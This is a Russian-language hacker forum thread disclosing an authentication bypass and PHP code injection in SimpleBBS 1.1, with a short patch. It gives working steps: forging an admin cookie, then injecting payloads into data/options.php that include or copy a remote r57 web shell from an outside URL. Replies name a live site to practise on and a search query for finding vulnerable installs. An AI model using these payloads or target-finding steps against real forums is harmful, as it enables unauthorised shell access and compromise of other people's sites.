SimpleBBS 1.1 PHP code execution |
30.12.2006, 14:51
|
|
Флудер
Регистрация: 27.12.2005
Сообщений: 2,372
С нами:
10721066
Репутация:
4360
|
|
SimpleBBS 1.1 PHP code execution
Продукт: SimpleBBS 1.1
Уязвимость: Выполнение произвольного PHP-кода
Опасность: Критическая
Описание
Выполнение PHP кода найдено в скрипте администрирования форума SimpleBBS.
В параметре "Title font" в панели администратора можно ввести php-код в виде:
который будет выполнен при прямом обращении к скрипту data/options.php
Чтобы получить доступ к панели администрирования достаточно установить cookie с именем SbbCookie и значением - ником администратора. Ник администратора можно получить со страницы пользователей.
Для получения шелла потребуется код:
Код:
include($_GET[c]);die;/*
Обращаться - data/options.php?c=http://www.site.com/r57shell.txt
или
Код:
copy($_GET[a],$_GET[ b]);die;/*
Обращаться - data/options.php?a=http://www.site.com/r57shell.txt&b=topics.php и шелл будет скопирован в topics.php.
Защита
Предлагается фильтровать параметр ylarivifont следующим кодом.
includes/adminjee3.php
Было:
PHP код:
$tallennus = fopen("data/options.php", "w");
flock ($tallennus,2);
fwrite($tallennus, "<?php
// TITLE FONT, FONTSIZE, FONTCOLOR, BGCOLOR
$ylarivifont
Заменить на:
PHP код:
$tallennus = fopen("data/options.php", "w");
flock ($tallennus,2);
$ylarivifont = htmlspecialchars($ylarivifont);
fwrite($tallennus, "<?php
// TITLE FONT, FONTSIZE, FONTCOLOR, BGCOLOR
$ylarivifont
Author: Great
|
|
|
30.12.2006, 22:07
|
|
Познающий
Регистрация: 14.12.2006
Сообщений: 58
С нами:
10214253
Репутация:
174
|
|
Гугл выдал - SimpleBBS is a free flat-file based bulletin board. It is very easy to install and use, and there are no useless features so even first timers can learn to ...
если есть пароль к админке на бюлетене, это будет работать? или может, ЭТО, другие вкусности на бюлетене позволяет?
С НОВЫМ 2007! =)
|
|
|
|
30.12.2006, 22:29
|
|
Флудер
Регистрация: 27.12.2005
Сообщений: 2,372
С нами:
10721066
Репутация:
4360
|
|
Пароль к админке не нужен. Я описал две баги - вход в админку без пароля и выполнение в админке произвольного кода.
если есть пасс, первая бага не нужна. сразу заходи в админку
|
|
|
|
30.12.2006, 22:40
|
|
Познающий
Регистрация: 14.12.2006
Сообщений: 58
С нами:
10214253
Репутация:
174
|
|
del
|
|
|
|
31.12.2006, 01:47
|
|
Познавший АНТИЧАТ
Регистрация: 07.05.2006
Сообщений: 1,031
С нами:
10533245
Репутация:
773
|
|
Вот тут мона потренировацца
http://asukkaat.hoas.fi/tukkitie/forum/index.php
|
|
|
|
31.12.2006, 11:04
|
|
Флудер
Регистрация: 27.12.2005
Сообщений: 2,372
С нами:
10721066
Репутация:
4360
|
|
_http://www.google.ru/search?q=%22Powered+by+SimpleBBS+v1.1%22
|
|
|
|
31.12.2006, 13:41
|
|
Постоянный
Регистрация: 17.09.2005
Сообщений: 375
С нами:
10866583
Репутация:
175
|
|
зашел на офф сайт
Simplemedia.org is currently down.
It will be back when SimpleBBS v1.2 is ready for open beta stage.
..... |
|
|
|
|
 |
Похожие темы
|
| Тема |
Автор |
Раздел |
Ответов |
Последнее сообщение |
|
Books
|
PSalm69 |
Избранное |
273 |
13.02.2016 01:24 |
|
Books PHP
|
FRAGNATIC |
PHP |
186 |
21.02.2010 02:41 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
